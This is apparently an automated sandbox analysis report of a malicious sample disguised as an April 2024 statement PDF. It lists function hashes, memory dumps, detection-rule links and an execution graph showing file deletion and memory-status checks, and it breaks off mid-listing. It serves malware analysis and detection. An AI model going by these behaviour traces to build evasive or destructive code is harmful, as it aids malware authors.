                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00DBD005 Relevance: .1, Instructions: 62COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2069689176.0000000000DBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DBD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_dbd000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6931329aba923d8a10e0f90d65263030b7a42586e4c810d105389d167e5b41d5
                                  • Instruction ID: d3953349114e4f176f4660de2433f95e8cb3eaa9eb7ab9dd81fde747b11d19d9
                                  • Opcode Fuzzy Hash: 6931329aba923d8a10e0f90d65263030b7a42586e4c810d105389d167e5b41d5
                                  • Instruction Fuzzy Hash: FB218E75509380CFCB02DF24D994715BF72EB46314F28C5EAD8498B2A7C33A980ACB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00DAD4BF Relevance: .1, Instructions: 56COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2069617322.0000000000DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DAD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_dad000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                  • Instruction ID: 07c6449b63fb9caf58b6728c37f0d85f9493805394c8f55442cf54c455b81ec1
                                  • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                                  • Instruction Fuzzy Hash: C9112672804280CFCB02CF10D5C4B16BF72FB99314F28C6A9D84A0B656C336D85ADBA2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00DBD1CF Relevance: .1, Instructions: 53COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2069689176.0000000000DBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DBD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_dbd000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                  • Instruction ID: 2716b3712a9edc6e0d9c0d173526ef557b193b5970df3933e63c60b903268b09
                                  • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                                  • Instruction Fuzzy Hash: 0111BB75504280DFCB02CF10C5C4B15BFA2FB84314F28C6A9D84A4B296C33AD80ACB62
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00DAD745 Relevance: .0, Instructions: 45COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2069617322.0000000000DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DAD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_dad000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d1a15b4762cce63673146ef8c397b38297940212713da5e38c1255457645c3eb
                                  • Instruction ID: 37b30eb351aa2fc20c66be581e2eb9b0e240fb9208c83b05024a400956fb7aa1
                                  • Opcode Fuzzy Hash: d1a15b4762cce63673146ef8c397b38297940212713da5e38c1255457645c3eb
                                  • Instruction Fuzzy Hash: 9E0126710043409AE7248F29CD84B67BF9DEF47324F28C92AED4B4A696D279DC40CAB1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00DAD744 Relevance: .0, Instructions: 36COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2069617322.0000000000DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DAD000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_dad000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 84d71fb5c1652cadac1a385c93670f47798fa2bd527b21eced80007b94b51805
                                  • Instruction ID: e229c5aeb7de8005df4886e560f368b38057044fc685e1639ef0453ccf1d4b92
                                  • Opcode Fuzzy Hash: 84d71fb5c1652cadac1a385c93670f47798fa2bd527b21eced80007b94b51805
                                  • Instruction Fuzzy Hash: 99F096714043449EEB248F16CCC8B62FF98EF56734F18C55AED4A4B696C2799C44CBB1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  Function 070C3810 Relevance: 5.3, Strings: 4, Instructions: 259COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2076705663.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70c0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: T+-q$[V~*$[V~*$]\`
                                  • API String ID: 0-1849991408
                                  • Opcode ID: 0b6f3f1460400ba79407d6541b407f35d4cf8692b61d8864e0bd054ced07eea0
                                  • Instruction ID: 69d62fe741a47cf9cebde8c6fe3cc8181551bf4d75aafdd1e12fbde44c0d15fb
                                  • Opcode Fuzzy Hash: 0b6f3f1460400ba79407d6541b407f35d4cf8692b61d8864e0bd054ced07eea0
                                  • Instruction Fuzzy Hash: EDB1E5B0E2561ADBDB04CFAAD98089EFBF2FF89300F14D62AD415BB258D33099058F55
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 070C3800 Relevance: 4.0, Strings: 3, Instructions: 259COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2076705663.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70c0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: T+-q$[V~*$]\`
                                  • API String ID: 0-3978741314
                                  • Opcode ID: 4a707dbf5e1a8b9e0833f89185e3f260b2a5f4f08b7290ee3c9646e541fe98a8
                                  • Instruction ID: aecdb4c3f85f38de8988a85916a686e3b09a64ee8cdec55fffa41d764419252a
                                  • Opcode Fuzzy Hash: 4a707dbf5e1a8b9e0833f89185e3f260b2a5f4f08b7290ee3c9646e541fe98a8
                                  • Instruction Fuzzy Hash: CAB1F6B0E2521A9FDB04CFAAD98089EFBF2FF89300F14D62AD415BB259D73099058F55
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 070CC5B8 Relevance: 1.6, Strings: 1, Instructions: 312COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2076705663.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70c0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: M|G}
                                  • API String ID: 0-2220694155
                                  • Opcode ID: 4edf8223191fa2b091298a4a50c23fd1da1ae7efb9fc020e0f936493f4c914e1
                                  • Instruction ID: 45cbb219094fd8437502eb9b85a69d327175cc4f43e2acbf800e43a281cf69f8
                                  • Opcode Fuzzy Hash: 4edf8223191fa2b091298a4a50c23fd1da1ae7efb9fc020e0f936493f4c914e1
                                  • Instruction Fuzzy Hash: D7E11EB4E002198FDB14DFA9C6819AEFBF2FF89315F248259D419A735AD730A941CF60
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 04F40518 Relevance: .3, Instructions: 315COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2074098336.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_4f40000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: abf0a88e56e5b083decfd86cfa05b68751e6e598219814d10166d84db146baed
                                  • Instruction ID: e862151d3ee793e4a7f5860f982125f7f65c477073264c0ea708b49c35652100
                                  • Opcode Fuzzy Hash: abf0a88e56e5b083decfd86cfa05b68751e6e598219814d10166d84db146baed
                                  • Instruction Fuzzy Hash: 5D1280B2401F4A8EE310CF66ED4C18A7EB1BB85318BA15609D2617B3F5DBB9158ECF44
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 070CA4E8 Relevance: .3, Instructions: 312COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2076705663.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70c0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f9652089ac09b8908348acdf3a70e407fbaedad8d6bfcbcae51bc5592f854234
                                  • Instruction ID: 48cae0a85cf3e3a469c1146f292a96c558708469d1f7028d9512a363152d4a8a
                                  • Opcode Fuzzy Hash: f9652089ac09b8908348acdf3a70e407fbaedad8d6bfcbcae51bc5592f854234
                                  • Instruction Fuzzy Hash: D5E1C9B4E002198FCB14DFA9C6819AEBBF2BF89305F24C269D414A735AD735A941CF61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 070CC180 Relevance: .3, Instructions: 312COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2076705663.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70c0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: aec938529d88f030f620cea4f5a04cab4e904eb7ae7ceb033354e39fa1d9f059
                                  • Instruction ID: 6eed69342735b643a3bfa7591d3de9e749afb18e2565cabf0a7176c21a2b64bd
                                  • Opcode Fuzzy Hash: aec938529d88f030f620cea4f5a04cab4e904eb7ae7ceb033354e39fa1d9f059
                                  • Instruction Fuzzy Hash: 7BE1FDB4E002198FDB14DFA9C5809AEFBF2FF89305F248259D419AB35AD731A941CF61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 070CA0B0 Relevance: .3, Instructions: 312COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2076705663.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70c0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f434d0686417892ffc15e62b22ac4acf28c491597591a8685880203244583c82
                                  • Instruction ID: 4910b53b195ce29106402b3d5ef2fb0f3a52d28bcd4d7995b916d06a94ed65f2
                                  • Opcode Fuzzy Hash: f434d0686417892ffc15e62b22ac4acf28c491597591a8685880203244583c82
                                  • Instruction Fuzzy Hash: 32E1ECB4E012198FCB14DFA9C5809AEFBF2BF89315F24C269D414AB35AD735A941CF60
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 070CA920 Relevance: .3, Instructions: 312COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2076705663.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70c0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b5db754a64e9e657bc6d1ab88edcdaa980451081dd71d62bfc738cc27e611bce
                                  • Instruction ID: 29f5e7327083f0663bc38a3ac50a5facf8dedc05a2cf75a6748f5bdb61cf7f43
                                  • Opcode Fuzzy Hash: b5db754a64e9e657bc6d1ab88edcdaa980451081dd71d62bfc738cc27e611bce
                                  • Instruction Fuzzy Hash: A3E1FAB4E012198FCB14DF99C6809AEFBF2BF89305F24C259D415A735AD731A941CF61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 070C2117 Relevance: .3, Instructions: 273COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2076705663.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70c0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 50820024feda85a69abf0c45327386afbebee3e3c7bf7b7bc3072524353a7da0
                                  • Instruction ID: 2bdc5e8d78a91a776006b248f52781c025c207f8d60bdafa1e6a71b1d06df720
                                  • Opcode Fuzzy Hash: 50820024feda85a69abf0c45327386afbebee3e3c7bf7b7bc3072524353a7da0
                                  • Instruction Fuzzy Hash: 16D15931D1074A8ACB11EF64DA50A9DB7B1FF96300F10C79AE0493B665FB746AC5CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 070C2141 Relevance: .3, Instructions: 271COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2076705663.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70c0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0d2eb8d6343487ca7f4967b13b616a346af2b6b333c19be5785604c51a66ae48
                                  • Instruction ID: 786377b27b460d8b61bad95d12b3b22f7d3d7538bb961afd540cad4ff9be0a58
                                  • Opcode Fuzzy Hash: 0d2eb8d6343487ca7f4967b13b616a346af2b6b333c19be5785604c51a66ae48
                                  • Instruction Fuzzy Hash: 3AD14831C1075A8ACB11EF64DA50A9EB3B1FF96300F10C79AE0093B665FB746AC5CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 070C2150 Relevance: .3, Instructions: 264COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2076705663.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70c0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 58e3ceb1e675c2d30632e60b5e426e6c64659ad0cfd2fef28a207844968e0a18
                                  • Instruction ID: 90320b964593652ef4da06c8663f3974d756344d4d0251273691cc652a8d64ad
                                  • Opcode Fuzzy Hash: 58e3ceb1e675c2d30632e60b5e426e6c64659ad0cfd2fef28a207844968e0a18
                                  • Instruction Fuzzy Hash: 4BD13831C1075A8ACB11EF64DA50A9EB3B5FF96300F10C79AE0093B665FB746AC5CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00E1E3B4 Relevance: .3, Instructions: 264COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2069979331.0000000000E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E10000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e10000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: afaffd2b1f8fc896e4abbf71bcd2986e58dc18a189bf5def6c34d2dc1a28c786
                                  • Instruction ID: 4805ea745fa20bce1d64865c37812e90caf514484b5c57022d873206525b13cb
                                  • Opcode Fuzzy Hash: afaffd2b1f8fc896e4abbf71bcd2986e58dc18a189bf5def6c34d2dc1a28c786
                                  • Instruction Fuzzy Hash: 35A16A32A002198FCF09DFB5C8445DEBBB2FF84304B15557AE916BB265DB35E986CB80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 04F40508 Relevance: .2, Instructions: 223COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2074098336.0000000004F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_4f40000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4ebeb0e4115345474126cc88525cc2f8e6c89e03eabbade377159b2afe4ea431
                                  • Instruction ID: 11cce3430b3ca3e480fbf3653114e793a6abaaa4fdb3ed6f7bc257678643e84e
                                  • Opcode Fuzzy Hash: 4ebeb0e4115345474126cc88525cc2f8e6c89e03eabbade377159b2afe4ea431
                                  • Instruction Fuzzy Hash: C8C1E3B2801B4A8ED710CF26ED4C18ABFB1BB85328BA55609D1617B3F4DBB4158ECF44
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 070CC16F Relevance: .1, Instructions: 130COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2076705663.00000000070C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070C0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_70c0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cd587186e5c824d6ad525b84f71d589daa4d36c6e575badaa62ef956592ec53d
                                  • Instruction ID: b7149f253c9929ad6b25da8f755e37b324769fe5df2738628349ca43a3aaea0b
                                  • Opcode Fuzzy Hash: cd587186e5c824d6ad525b84f71d589daa4d36c6e575badaa62ef956592ec53d
                                  • Instruction Fuzzy Hash: E2512CB0E042198FDB15DFA9C6805AEFBF2BF89305F24C16AD418AB356D7349A41CF61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Execution Graph

                                  Execution Coverage:10.1%
                                  Dynamic/Decrypted Code Coverage:100%
                                  Signature Coverage:0%
                                  Total number of Nodes:57
                                  Total number of Limit Nodes:6
                                  execution_graph 42437 f00848 42439 f0084e 42437->42439 42438 f0091b 42439->42438 42441 f0138f 42439->42441 42442 f0132a 42441->42442 42443 f01393 42441->42443 42442->42439 42443->42442 42450 f08348 42443->42450 42455 f07fc4 42443->42455 42460 f08002 42443->42460 42465 f08061 42443->42465 42470 f07e87 42443->42470 42475 f07e98 42443->42475 42451 f08352 42450->42451 42452 f0836c 42451->42452 42480 66bf9ef 42451->42480 42485 66bfa00 42451->42485 42452->42443 42456 f07fc9 42455->42456 42490 f08110 42456->42490 42494 f08101 42456->42494 42457 f080f3 42457->42443 42462 f08007 42460->42462 42461 f080f3 42461->42443 42463 f08110 DeleteFileW 42462->42463 42464 f08101 DeleteFileW 42462->42464 42463->42461 42464->42461 42466 f08066 42465->42466 42468 f08110 DeleteFileW 42466->42468 42469 f08101 DeleteFileW 42466->42469 42467 f080f3 42467->42443 42468->42467 42469->42467 42472 f07eb1 42470->42472 42471 f080f3 42471->42443 42472->42471 42473 f08110 DeleteFileW 42472->42473 42474 f08101 DeleteFileW 42472->42474 42473->42471 42474->42471 42476 f07eb1 42475->42476 42477 f080f3 42476->42477 42478 f08110 DeleteFileW 42476->42478 42479 f08101 DeleteFileW 42476->42479 42477->42443 42478->42477 42479->42477 42481 66bfa15 42480->42481 42482 66bfc26 42481->42482 42483 66bfc50 GlobalMemoryStatusEx 42481->42483 42484 66bfc41 GlobalMemoryStatusEx 42481->42484 42482->42452 42483->42481 42484->42481 42486 66bfa15 42485->42486 42487 66bfc26 42486->42487 42488 66bfc41 GlobalMemoryStatusEx 42486->42488 42489 66bfc50 GlobalMemoryStatusEx 42486->42489 42487->42452 42488->42486 42489->42486 42491 f08120 42490->42491 42492 f08152 42491->42492 42498 f07800 42491->42498 42492->42457 42496 f08110 42494->42496 42495 f08152 42495->42457 42496->42495 42497 f07800 DeleteFileW 42496->42497 42497->42495 42499 f08170 DeleteFileW 42498->42499 42501 f081ef 42499->42501 42501->42492 42432 e91000 42433 e9101c 42432->42433 42434 e91126 42433->42434 42435 66bf9ef GlobalMemoryStatusEx 42433->42435 42436 66bfa00 GlobalMemoryStatusEx 42433->42436 42435->42433 42436->42433

                                  Executed Functions

                                  Function 066B2750 Relevance: 9.0, Strings: 6, Instructions: 1479COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3332483660.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_66b0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $jq$$jq$$jq$$jq$$jq$$jq
                                  • API String ID: 0-3356825164
                                  • Opcode ID: 254f54cb6990bfb9cc87280f72cf8bac26651a5e3e57a03746741e5d6ddb0aee
                                  • Instruction ID: 63862cfdc0e9f434b68f91f3aeca856da343955e325150e61d97169bcadb8390
                                  • Opcode Fuzzy Hash: 254f54cb6990bfb9cc87280f72cf8bac26651a5e3e57a03746741e5d6ddb0aee
                                  • Instruction Fuzzy Hash: ABD25830A00605CFDB64DF68C594AADB7F6FF85300F5495AAD409AB365EB34ED86CB80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 066BB1F8 Relevance: 8.3, Strings: 6, Instructions: 764COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3332483660.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_66b0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $jq$$jq$$jq$$jq$$jq$$jq
                                  • API String ID: 0-3356825164
                                  • Opcode ID: 483615c979a7cc42bfcb8f089144bf9d13e9e9c6debe00d4b38749731b3a2993
                                  • Instruction ID: 041004b212bdb1f5422fa8e3583d1f388c237b58242b58f7a99db3ec4fda9e2a
                                  • Opcode Fuzzy Hash: 483615c979a7cc42bfcb8f089144bf9d13e9e9c6debe00d4b38749731b3a2993
                                  • Instruction Fuzzy Hash: DB525C30E10209CFDBA4DF69D5807AEB7A6EB85310F24952AE405EB395DF34EC85CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 066B7D48 Relevance: 3.0, Strings: 2, Instructions: 474COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1841 66b7d48-66b7d66 1842 66b7d68-66b7d6b 1841->1842 1843 66b7d6d-66b7d87 1842->1843 1844 66b7d8c-66b7d8f 1842->1844 1843->1844 1845 66b7db2-66b7db5 1844->1845 1846 66b7d91-66b7dad 1844->1846 1847 66b7dc2-66b7dc5 1845->1847 1848 66b7db7-66b7dc1 1845->1848 1846->1845 1851 66b7ddc-66b7dde 1847->1851 1852 66b7dc7-66b7dd5 1847->1852 1853 66b7de0 1851->1853 1854 66b7de5-66b7de8 1851->1854 1858 66b7dee-66b7e04 1852->1858 1859 66b7dd7 1852->1859 1853->1854 1854->1842 1854->1858 1861 66b7e0a-66b7e13 1858->1861 1862 66b801f-66b8029 1858->1862 1859->1851 1863 66b802a-66b8034 1861->1863 1864 66b7e19-66b7e36 1861->1864 1867 66b808b-66b8096 1863->1867 1868 66b8036-66b805f 1863->1868 1872 66b800c-66b8019 1864->1872 1873 66b7e3c-66b7e64 1864->1873 1876 66b807b-66b8088 1867->1876 1877 66b8098-66b80dc 1867->1877 1870 66b8061-66b8064 1868->1870 1874 66b806a-66b8079 1870->1874 1875 66b8299-66b829c 1870->1875 1872->1861 1872->1862 1873->1872 1895 66b7e6a-66b7e73 1873->1895 1874->1876 1874->1877 1878 66b82bf-66b82c2 1875->1878 1879 66b829e-66b82ba 1875->1879 1876->1867 1889 66b826d-66b8283 1877->1889 1890 66b80e2-66b80f3 1877->1890 1881 66b82c8-66b82d4 1878->1881 1882 66b836d-66b836f 1878->1882 1879->1878 1893 66b82df-66b82e1 1881->1893 1886 66b8371 1882->1886 1887 66b8376-66b8379 1882->1887 1886->1887 1887->1870 1891 66b837f-66b8388 1887->1891 1889->1875 1907 66b80f9-66b8116 1890->1907 1908 66b8258-66b8267 1890->1908 1897 66b82f9-66b82fd 1893->1897 1898 66b82e3-66b82e9 1893->1898 1895->1863 1904 66b7e79-66b7e95 1895->1904 1901 66b830b 1897->1901 1902 66b82ff-66b8309 1897->1902 1899 66b82eb 1898->1899 1900 66b82ed-66b82ef 1898->1900 1899->1897 1900->1897 1906 66b8310-66b8312 1901->1906 1902->1906 1914 66b7e9b-66b7ec5 1904->1914 1915 66b7ffa-66b8006 1904->1915 1909 66b8323-66b835c 1906->1909 1910 66b8314-66b8317 1906->1910 1907->1908 1920 66b811c-66b8212 call 66b6578 1907->1920 1908->1889 1908->1890 1909->1874 1929 66b8362-66b836c 1909->1929 1910->1891 1927 66b7ecb-66b7ef3 1914->1927 1928 66b7ff0-66b7ff5 1914->1928 1915->1872 1915->1895 1976 66b8220 1920->1976 1977 66b8214-66b821e 1920->1977 1927->1928 1935 66b7ef9-66b7f27 1927->1935 1928->1915 1935->1928 1940 66b7f2d-66b7f36 1935->1940 1940->1928 1942 66b7f3c-66b7f6e 1940->1942 1950 66b7f79-66b7f95 1942->1950 1951 66b7f70-66b7f74 1942->1951 1950->1915 1953 66b7f97-66b7fee call 66b6578 1950->1953 1951->1928 1952 66b7f76 1951->1952 1952->1950 1953->1915 1978 66b8225-66b8227 1976->1978 1977->1978 1978->1908 1979 66b8229-66b822e 1978->1979 1980 66b823c 1979->1980 1981 66b8230-66b823a 1979->1981 1982 66b8241-66b8243 1980->1982 1981->1982 1982->1908 1983 66b8245-66b8251 1982->1983 1983->1908
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.3332483660.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_9_2_66b0000_SOA FOR APR 2024 PDF.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $jq$$jq
                                  • API String ID: 0-3720491408
                                  • Opcode ID: 834497b14fec938e576eab2e499af82dd962c05b89b8842097d2d8772a727622
                                  • Instruction ID: 190eeabdb8d7a8991f1e87d0b58e8a115f316a63f3670f7b1f7139e366156119
                                  • Opcode Fuzzy Hash: 834497b14fec938e576eab2e499af82dd962c05b89b8842097d2d8772a727622
                                  • Instruction Fuzzy Hash: 2D02AD30B00605CFCB54DF68D594AAEBBB6FF84344F248569E4059B399DB35ED86CB80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 066B5568 Relevance: 1.8, Strings: 1, Instructions: 593COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 2334 66b5568-66b5585 2335 66b5587-66b558a 2334->2335 2336 66b5598-66b559b 2335->2336 2337 66b558c-66b5593 2335->2337 2338 66b55ae-66b55b1 2336->2338 2339 66b559d-66b55a3 2336->2339 2337->2336 2342 66b55b9-66b55bc 2338->2342 2343 66b55b3-66b55b4 2338->2343 2340 66b55a9 2339->2340 2341 66b56c4-66b56d2 2339->2341 2340->2338 2346 66b56d9-66b56dc 2341->2346 2344 66b55be-66b55c2 2342->2344 2345 66b55cd-66b55d0 2342->2345 2343->2342 2347 66b55c8 2344->2347 2348 66b5734-66b5740 2344->2348 2349 66b55d2-66b55d5 2345->2349 2350 66b5605-66b5608 2345->2350 2353 66b56e1-66b56e4 2346->2353 2347->2345 2351 66b55db-66b55e6 2349->2351 2352 66b5741-66b576b 2349->2352 2354 66b560a-66b560c 2350->2354 2355 66b560f-66b5612 2350->2355 2351->2352 2356 66b55ec-66b55f6 2351->2356 2371 66b5775-66b5778 2352->2371 2357 66b56fb-66b56fe 2353->2357 2358 66b56e6-66b56f6 2353->2358 2354->2355 2355->2339 2359 66b5614-66b5617 2355->2359 2356->2352 2360 66b55fc-66b5600 2356->2360 2364 66b5722-66b5724 2357->2364 2365 66b5700-66b571d 2357->2365 2358->2357 2362 66b5619-66b5629 2359->2362 2363 66b562e-66b5631 2359->2363 2360->2350 2362->2363 2367 66b563b-66b563e 2363->2367 2368 66b5633-66b5636 2363->2368 2369 66b572b-66b572e 2364->2369 2370 66b5726 2364->2370 2365->2364 2374 66b564d-66b5650 2367->2374 2375 66b5640-66b5646 2367->2375 2368->2367 2369->2335 2369->2348 2370->2369 2377 66b579a-66b579d 2371->2377 2378 66b577a-66b577e 2371->2378 2374->2375 2376 66b5652-66b5655 2374->2376 2375->2349 2379 66b5648 2375->2379 2380 66b565f-66b5662 2376->2380 2381 66b5657-66b565a 2376->2381 2384 66b579f-66b57a9 2377->2384 2385 